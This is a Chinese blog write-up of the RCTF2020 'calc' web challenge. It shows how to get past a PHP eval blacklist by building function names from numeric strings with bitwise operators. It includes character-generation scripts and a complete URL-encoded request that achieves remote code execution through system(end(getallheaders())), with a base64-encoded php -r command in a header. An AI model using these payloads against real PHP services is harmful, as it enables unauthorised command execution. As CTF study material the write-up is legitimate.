0%

RCTF2020-复现

发表于 更新于 分类于 Valine: 本文字数: 15k 阅读时长 ≈ 14 分钟
附加一段文章摘要,字数最好在140字以内,会出现在meta的description里面

WEB

1.calc

RoarCTF2020的easy_calc的升级版,过滤了更多字符,但思路还是一样的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
    $str = $_GET['num'];
    $blacklist = ['[a-z]', '[\x7f-\xff]', '\s',"'", '"', '`', '\[', '\]','\$', '_', '\\\\','\^', ','];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/im', $str)) {
            die("what are you want to do?");
        }
    }
    @eval('echo '.$str.';');
}
?>

​ 在 PHP 中,将两个数字使用.拼接,会当做字符串来处理,返回的也是一个字符串。例如:(1).(2)出来的就是字符串"12",然后可以用{}来代替[]来取单个字符。所以我们可以先获得一部分字符然后位运算获取所有的字符

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
echo(((9999999999999999999).(0)){1}); // .
echo(((9999999999999999999).(0)){3}); //E
echo(((9999999999999999999).(0)){4}); // +
print("\n");

echo(((999**999).(0)){0}); //I
echo(((999**999).(0)){1}); // N
echo(((999**999).(0)){2}); // F

print("\n");

echo(((0/0).(0)){1}); // A

print("\n");

echo("1" | "E");//u
echo("3" | "E"); // w
echo("4" | "I"); // }
echo("0" | "I"); // y
echo("0" | "F"); //v

chamd5的构造脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
strings = ['0','1','2','3','4','5','6','7','8','9','E','u','w','}','+','.','I','N','F','y','v']

input_value = 'o'

for s in strings:
  for s1 in strings:
    data = (chr(ord(s)|ord(s1))).strip()
    if data not in strings:
      strings.append(data)
    if data == input_value:
      # print(data)
      print('success',s,'|',s1)

print(len(strings))

for s in strings:
  for s1 in strings:
    data = (chr(ord(s)&ord(s1)))
    data = data.strip()
    if data == input_value:
      # print(data)
      print('success',s,'&',s1)
print(len(strings))
for s in strings:
  for s1 in strings:
    data = (chr(ord(s)|ord(s1))).strip()
    if data not in strings:
      strings.append(data)
    if data == input_value:
      # print(data)
      print('success',s,'|',s1)
print(len(strings))
for s in strings:
  for s1 in strings:
    try:
      data = (chr(ord(s)&ord(s1))).strip()
    except:
      continue
    if data not in strings:
      strings.append(data)

    if data == input_value:
      # print(data)
      print('success',s,'&',s1)

for s in strings:
  try:
    data = chr(~ord(s))
  except:
    continue
  data = data.strip()
  if data not in strings:
    strings.append(data)
    if data == input_value:
      # print(data)
      print('success ~',s)

手工拼了个 pHpINFo

1
2
3
4
5
6
7
8
9
$a='';
$a.=(((0).(0){0})|(((999**999).(0)){0}))&(((0).(0){0})|(((999**999).(0)){2})); //p=y&v
$a.= (((0).(0){0})|(((999**999).(0)){0}))&(((999**999).(0)){1});//H=y&N
$a.=(((0).(0){0})|(((999**999).(0)){0}))&(((0).(0){0})|(((999**999).(0)){2})); //p=y&v
$a.=(((999**999).(0)){0}); //I
$a.=(((999**999).(0)){1}); //N
$a.= (((3).(0){0})|(((9999999999999999999).(0)){3}))&(((999**999).(0)){1});//F=w & N
$a.= (((9999999999999999999).(0)){3})|(((9999999999999999999).(0)){4});//o=E | +
echo $a;

完整的payload

1
(((((0).(0){0})|(((999**999).(0)){0}))&(((0).(0){0})|(((999**999).(0)){2}))).((((0).(0){0})|(((999**999).(0)){0}))&(((999**999).(0)){1})).((((0).(0){0})|(((999**999).(0)){0}))&(((0).(0){0})|(((999**999).(0)){2}))).((((999**999).(0)){0})).((((999**999).(0)){1})).((((3).(0){0})|(((9999999999999999999).(0)){3}))&(((999**999).(0)){1})).((((9999999999999999999).(0)){3})|(((9999999999999999999).(0)){4})))()

后面的不拼了…… 直接用师傅们的payload

题目中断外网,并且需要/readflag,即需要一个shell. 进行命令执行.

  • 有几种方式

  1. system(end(getallheaders()));

  2. system(file_get_contents(“php://input”));

  3. 把脚本内容写到一个文件, 最后执行

system(end(getallheaders()));的payload;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<?php 
$a ='';
$a .= ((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(3)){1}));
$a .= ((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(9)){1}));
$a .= ((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(3)){1}));
$a .= ((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(4)){1}));
$a .= (((10000000000000000000).(1)){3});
$a .= ((((10000000000000000000).(1)){3})|(((-1).(1)){0}));
echo $a; //systEm
?>

<?php 
$a ='';
$a .= (((10000000000000000000).(1)){3}); // E
$a .= (((((10000000000000000000).(1)){3})|(((1.1).(1)){1}))&((~(((1).(7)){1})|(((1).(0)){1}))|(((1).(6)){1}))); //n
$a .= ((((10000000000000000000).(1)){3})&((~(((1).(7)){1})|(((1).(0)){1}))|(((1).(6)){1}))); //D
echo $a; //EnD
?>

<?php // getallheaders
$a ='';
$a .= ((((10000000000000000000).(1)){3})|(((1.1).(1)){1})&((~(((1).(8)){1})|(((1).(7)){1})))); // g
$a .= (((10000000000000000000).(1)){3}); // E
$a .= ((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(4)){1})); //T
$a .= ((((10000000000000000000).(1)){3})&((~(((1).(7)){1})|(((1).(0)){1}))|(((1).(1)){1}))); //a
$a .= (((((10000000000000000000).(1)){3})|(((1.1).(1)){1}))&((~(((1).(7)){1})|(((1).(0)){1}))|(((1).(4)){1}))); // l
$a .= (((((10000000000000000000).(1)){3})|(((1.1).(1)){1}))&((~(((1).(7)){1})|(((1).(0)){1}))|(((1).(4)){1}))); // l
$a .= (((((10000000000000000000).(1)){3})|(((1.1).(1)){1}))&((~(((1).(7)){1})|(((1).(0)){1}))|(((1).(0)){1}))); // h
$a .= (((10000000000000000000).(1)){3}); // E
$a .= ((((10000000000000000000).(1)){3})&((~(((1).(7)){1})|(((1).(0)){1}))|(((1).(1)){1}))); //a
$a .= ((((10000000000000000000).(1)){3})&((~(((1).(7)){1})|(((1).(0)){1}))|(((1).(4)){1}))); //D
$a .= (((10000000000000000000).(1)){3}); // E
$a .= ((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(2)){1})); // r
$a .= ((((10000000000000000000).(1)){3})&(~(((1).(7)){1})|(((1).(0)){1}))|(((1).(3)){1})); // s
echo $a;
?>

最后需要过/readflag的验证码, 可以使用使用Perl, 也可以通过 php -r ""的方式执行

1
php -r "eval(base64_decode('JHByb2Nlc3MgPSBwcm9jX29wZW4oDQogJy9yZWFkZmxhZycsDQogW1sicGlwZSIsICJyIl0sWyJwaXBlIiwgInciXSxbInBpcGUiLCAidyJdXSwkcGlwZXMNCik7DQpmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0KJGV4cCA9IGZyZWFkKCRwaXBlc1sxXSwgMTAyNCk7DQokZXhwID0gZXhwbG9kZSgiXG4iLCAkZXhwKVswXTsNCmZ3cml0ZSgkcGlwZXNbMF0sIGV2YWwoInJldHVybiAkZXhwOyIpLiJcbiIpOw0KZWNobyBmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0KZWNobyBmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0KZWNobyBmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0KZWNobyBmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0K'));"

最终的payload

1
2
3
GET /calc.php?num=(((((10000000000000000000).(1))%7B3%7D)%26(~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(3))%7B1%7D)).((((10000000000000000000).(1))%7B3%7D)%26(~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(9))%7B1%7D)).((((10000000000000000000).(1))%7B3%7D)%26(~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(3))%7B1%7D)).((((10000000000000000000).(1))%7B3%7D)%26(~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(4))%7B1%7D)).(((10000000000000000000).(1))%7B3%7D).((((10000000000000000000).(1))%7B3%7D)%7C(((-1).(1))%7B0%7D)))(((((10000000000000000000).(1))%7B3%7D).(((((10000000000000000000).(1))%7B3%7D)%7C(((1.1).(1))%7B1%7D))%26((~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(6))%7B1%7D))).((((10000000000000000000).(1))%7B3%7D)%26((~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(6))%7B1%7D))))((((((10000000000000000000).(1))%7B3%7D)%7C(((1.1).(1))%7B1%7D)%26((~(((1).(8))%7B1%7D)%7C(((1).(7))%7B1%7D)))).(((10000000000000000000).(1))%7B3%7D).((((10000000000000000000).(1))%7B3%7D)%26(~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(4))%7B1%7D)).((((10000000000000000000).(1))%7B3%7D)%26((~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(1))%7B1%7D))).(((((10000000000000000000).(1))%7B3%7D)%7C(((1.1).(1))%7B1%7D))%26((~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(4))%7B1%7D))).(((((10000000000000000000).(1))%7B3%7D)%7C(((1.1).(1))%7B1%7D))%26((~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(4))%7B1%7D))).(((((10000000000000000000).(1))%7B3%7D)%7C(((1.1).(1))%7B1%7D))%26((~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(0))%7B1%7D))).(((10000000000000000000).(1))%7B3%7D).((((10000000000000000000).(1))%7B3%7D)%26((~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(1))%7B1%7D))).((((10000000000000000000).(1))%7B3%7D)%26((~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(4))%7B1%7D))).(((10000000000000000000).(1))%7B3%7D).((((10000000000000000000).(1))%7B3%7D)%26(~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(2))%7B1%7D)).((((10000000000000000000).(1))%7B3%7D)%26(~(((1).(7))%7B1%7D)%7C(((1).(0))%7B1%7D))%7C(((1).(3))%7B1%7D)))()))%3B HTTP/1.1
Host: 124.156.140.90:8081
z: php -r "eval(base64_decode('JHByb2Nlc3MgPSBwcm9jX29wZW4oDQogJy9yZWFkZmxhZycsDQogW1sicGlwZSIsICJyIl0sWyJwaXBlIiwgInciXSxbInBpcGUiLCAidyJdXSwkcGlwZXMNCik7DQpmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0KJGV4cCA9IGZyZWFkKCRwaXBlc1sxXSwgMTAyNCk7DQokZXhwID0gZXhwbG9kZSgiXG4iLCAkZXhwKVswXTsNCmZ3cml0ZSgkcGlwZXNbMF0sIGV2YWwoInJldHVybiAkZXhwOyIpLiJcbiIpOw0KZWNobyBmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0KZWNobyBmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0KZWNobyBmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0KZWNobyBmcmVhZCgkcGlwZXNbMV0sIDEwMjQpOw0K'));"

后面又看到了开心师傅的脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
# -*- coding: utf-8 -*-
""" Python
Author: Mrkaixin
Date: 2020-05-30 21:32
FileName: exp.py
"""
import string

word_dict = {
    "0": "((0).(0))",
    "1": "((1).(0))",
    "2": "((2).(0))",
    "3": "((3).(0))",
    "4": "((4).(0))",
    "5": "((5).(0))",
    "6": "((6).(0))",
    "7": "((7).(0))",
    "8": "((8).(0))",
    "9": "((9).(0))",
    "=": "(((1).(0)))|(((4).(0))|((8).(0))){0}",
    "+": "((99999999999999999999).(1)){4}",
    ".": "((99999999999999999999).(1)){1}",
    "<": "(((4).(0))|((8).(0))){0}",
    "$": "(((4).(0)))%26((99999999999999999999).(1)){1}",
    "@": "(((1).(1/!1)){3})%26~((6).(1))",
    "~": "(((0).(0)))|(((99999999999999999999).(1)){1})|(((1).(1/!1)){3})%26~((6).(1))",

    "{": "(((0).(0)))|(((99999999999999999999).(1)){4})|(((1).(1/!1)){3})%26~((6).(1))",
    "}": "(((0).(0)))|((((4).(0)))%26((99999999999999999999).(1)){1})|(((2).(1/!1)){1})%26~((2).(3))",
    ",": "(((99999999999999999999).(1)){1})%26(((4).(0))|((8).(0))){0}",
    "(": "(((((1).(1/!1)){3})%26~((6).(1)))|((99999999999999999999).(1)){4})%26(((4).(0))|((8).(0))){0}",
    ")": "(((9).(0)))%26((((1).(1/!1)){3})%26~((6).(1)))|((99999999999999999999).(1)){4}",
    "d": "((((4).(0)))%26((99999999999999999999).(1)){1})|(((1).(1/!1)){3})%26~((6).(1))",
    "e": "((((4).(0)))%26((99999999999999999999).(1)){1})|(((2).(1/!1)){1})%26~((8).(3))",
    "f": "((((4).(0)))%26((99999999999999999999).(1)){1})|(((1).(1/!1)){3})%26~((4).(1))",
    "h": "((((((1).(1/!1)){3})%26~((6).(1)))|((99999999999999999999).(1)){4})%26(((4).(0))|((8).(0))){0})|(((1).(1/!1)){3})%26~((6).(1))",
    "i": "((((((1).(1/!1)){3})%26~((6).(1)))|((99999999999999999999).(1)){4})%26(((4).(0))|((8).(0))){0})|(((2).(1/!1)){1})%26~((8).(3))",
    "j": "((((((1).(1/!1)){3})%26~((6).(1)))|((99999999999999999999).(1)){4})%26(((4).(0))|((8).(0))){0})|(((1).(1/!1)){3})%26~((4).(1))",
    "k": "(((99999999999999999999).(1)){4})|(((1).(1/!1)){3})%26~((6).(1))",
    "l": "((((4).(0)))%26((99999999999999999999).(1)){1})|(((2).(1/!1)){1})%26~((5).(3))",
    "m": "((((4).(0)))%26((99999999999999999999).(1)){1})|(((2).(1/!1)){1})%26~((2).(3))",
    "n": "(((99999999999999999999).(1)){1})|(((1).(1/!1)){3})%26~((6).(1))",
    "o": "(((99999999999999999999).(1)){4})|(((2).(1/!1)){2})%26~((3).(3))",
    "p": "(((1).(1/!1)){3})%26~((6).(1))|((0).(0)){0}",
    "q": "(((1).(1/!1)){3})%26~((6).(1))|((1).(0)){0}",
    "r": "(((1).(1/!1)){3})%26~((6).(1))|((2).(0)){0}",
    "s": "(((1).(1/!1)){3})%26~((6).(1))|((3).(0)){0}",
    "t": "(((1).(1/!1)){3})%26~((6).(1))|((4).(0)){0}",
    "u": "(((1).(1/!1)){3})%26~((6).(1))|((5).(0)){0}",
    "v": "(((1).(1/!1)){3})%26~((6).(1))|((6).(0)){0}",
    "w": "(((1).(1/!1)){3})%26~((6).(1))|((7).(0)){0}",
    "x": "(((1).(1/!1)){3})%26~((6).(1))|((8).(0)){0}",
    "y": "(((1).(1/!1)){3})%26~((6).(1))|((9).(0)){0}",
    "z": "(((1).(1/!1)){3})%26~((6).(1))|((8).(0)){0}|((2).(0)){0}",
    "E": "((((2).(1/!1)){1})%26~((8).(3)))|(((2).(1/!1)){2})%26~((2).(1))%26~((9).(1))",
    "G": "((((2).(1/!1)){1})%26~((8).(3)))|(((1).(1/!1)){2})%26~((%39).(1))",
    "K": "((((1).(1/!1)){3})%26~((4).(1)))|(((2).(1/!1)){1})%26~((2).(3))",
    "M": "((((2).(1/!1)){1})%26~((8).(3)))|(((2).(1/!1)){2})%26~((3).(3))",
    "O": "((((2).(1/!1)){1})%26~((8).(3)))|(((1).(1/!1)){2})%26~((%30).(1))",
    "B": "(((1).(1/!1)){3})%26~((4).(1))",
    "C": "((((1).(1/!1)){3})%26~((4).(1)))|(((2).(1/!1)){1})%26~((8).(3))",
    "A": "(((2).(1/!1)){1})%26~((8).(3))",
    "I": "(((2).(1/!1)){1})%26~((2).(3))",
    "H": "(((2).(1/!1)){1})%26~((5).(3))",
    "L": "(((2).(1/!1)){2})%26~((3).(3))",
    "D": "(((2).(1/!1)){2})%26~((2).(1))%26~((9).(1))",
    "N": "(((1).(1/!1)){2})%26~((%30).(1))",
    "J": "(((1).(1/!1)){2})%26~((%34).(1))",
    "F": "(((1).(1/!1)){2})%26~((%39).(1))",
}

got = [i for i in word_dict.keys()]

# 这里写上想要的,配合高师傅的脚本一起用最好
iwant = string.ascii_letters + "_"


def Or():
    for need in iwant:
        flag = 0
        for i in got:
            if flag == 1: break
            for j in got:
                if flag == 1: break
                d = chr(ord(i) | ord(j))
                if d == need:
                    # print(d,i,j)
                    flag = 1

                    print(f"\"{d}\":\"({word_dict[i]})|{word_dict[j]}\",")


def And():
    for need in iwant:
        flag = 0
        for i in got:
            if flag == 1: break
            for j in got:
                if flag == 1: break
                d = chr(ord(i) & ord(j))
                if d == need:
                    # print(d,i,j)
                    flag = 1

                    print(f"\"{d}\":\"({word_dict[i]})%26{word_dict[j]}\",")


def product():
    # exp
    exp = ""
    # exp = "var"
    for i in exp:
        if i in got:
            print(f"({word_dict[i]}).")
        elif i.upper() in got:
            print(f"({word_dict[i.upper()]}).")
            # print(i.upper() + word_dict[i.upper()])
        else:
            print(i + "lost")


if __name__ == '__main__':
    And()
    # Or()
    # product()
-------------本文结束感谢您的阅读-------------